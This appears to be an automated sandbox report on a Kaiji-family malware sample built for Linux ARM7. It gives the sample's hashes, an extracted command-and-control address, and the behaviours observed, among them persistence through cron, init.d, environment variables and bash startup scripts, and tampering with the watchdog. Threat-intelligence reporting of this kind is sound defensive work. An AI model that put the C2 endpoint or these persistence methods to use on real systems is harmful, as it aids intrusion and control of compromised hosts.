General

  • Target

    linux_arm7

  • Size

    2.0MB

  • Sample

    250420-pajw2svtcs

  • MD5

    d4d36b5623331b7ae8dd841a740c4a54

  • SHA1

    608dda01f20f92bc967ad12d30d6d2a535c3e30f

  • SHA256

    5fa8b347636e9f92dc608623f80997fc260a24d9ac18118346e920c852291764

  • SHA512

    03abb5b9338d80f4bcc8e829c0b42758121e18085e049eecca31b5096134d1ed7b0905559cd1530ae9fc3c990cd43c5bd2bc8051b1d550bff10237c0340491f6

  • SSDEEP

    24576:H01f0dr8LVGxdIbrL4JCiDvJCzJI2hFvIw2c1lmsYhc0rJKyHjSY52dVh2HviGCM:AAibWT2xp2T1

Malware Config

Extracted

Family

kaiji

C2

103.45.68.160:888

Targets

    • Target

      linux_arm7

    • Size

      2.0MB

    • MD5

      d4d36b5623331b7ae8dd841a740c4a54

    • SHA1

      608dda01f20f92bc967ad12d30d6d2a535c3e30f

    • SHA256

      5fa8b347636e9f92dc608623f80997fc260a24d9ac18118346e920c852291764

    • SHA512

      03abb5b9338d80f4bcc8e829c0b42758121e18085e049eecca31b5096134d1ed7b0905559cd1530ae9fc3c990cd43c5bd2bc8051b1d550bff10237c0340491f6

    • SSDEEP

      24576:H01f0dr8LVGxdIbrL4JCiDvJCzJI2hFvIw2c1lmsYhc0rJKyHjSY52dVh2HviGCM:AAibWT2xp2T1

    • Kaiji

      Kaiji payload

    • Kaiji family

    • Executes dropped EXE

    • Modifies Watchdog functionality

      Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    • Creates/modifies Cron job

      Cron allows running tasks on a schedule, and is commonly used for malware persistence.

    • Creates/modifies environment variables

      Creating/modifying environment variables is a common persistence mechanism.

    • Enumerates running processes

      Discovers information about currently running processes on the system

    • Modifies init.d

      Adds/modifies system service, likely for persistence.

    • Write file to user bin folder

    • Modifies Bash startup script

MITRE ATT&CK Enterprise v16

Tasks